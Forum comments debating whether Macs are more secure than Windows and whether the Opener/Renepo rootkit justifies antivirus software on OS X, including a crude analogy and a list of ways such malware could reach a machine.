We've got tens of thousands of known Windows exploits in the wild, and you've just found maybe one for the Mac, and you're claiming there's therefore no difference in the relative perfection of their two security systems?
So I guess we could have a bunch of crackheaded drug addicts engaging in unprotected sex while rolling around naked in a garbage-strewn back alley littered with rusty used needles and leaking bags of infectuous medical waste, but you'd say (in response to our suggestion that the back-alley sex might not be such a good idea from a health safety perspective) that: since chaste, reclusive people can get sick too, there's NO SUCH THING as a perfectly healthy lifestyle. "Period."
Yes it is a rootkit, but you missed the point of how it GOT on the Macs without someone installing it, that is where the problem is, it doesn't matter what rootkit or trojan was being dropped in using the exploit it used.
Exactly. In order for the rootkit/trojan to get onto the Mac, one of four things must have happened:
A) The Mac had an unsafe network configuration (firewall off, services enabled, weak password, possibly an unpatched remote vulnerability)
B) A malicious user had physical access to the machine
C) A malicious user was authorized to use the machine (special case of B, really)
D) The machine's owner deliberately installed the rootkit, and forgot about it.
No antivirus application yet devised would have protected the user against any of these scenarios, regardless of OS. The idea that the Opener/Renepo rootkit somehow validates antivirus software on OS X is laughable.
The US free market: two halves of a government-granted duopoly are free to set the market price.